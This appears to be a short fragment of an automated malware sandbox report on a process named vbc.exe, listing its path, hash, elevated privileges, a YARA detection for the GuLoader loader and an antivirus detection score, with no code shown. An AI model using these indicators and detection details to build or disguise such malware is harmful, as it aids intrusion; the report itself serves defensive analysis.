      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: vbc.exe PID: 2192 Parent PID: 2124

      General

      Start time:14:03:20
      Start date:22/07/2021
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\Public\vbc.exe'
      Imagebase:0x400000
      File size:246888 bytes
      MD5 hash:C937FC9ED4325E6AB24D49A3175F3A5C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Author: Joe Security
      Antivirus matches:
      • Detection: 43%, ReversingLabs
      Reputation:low

      Disassembly

      Code Analysis

      Reset < >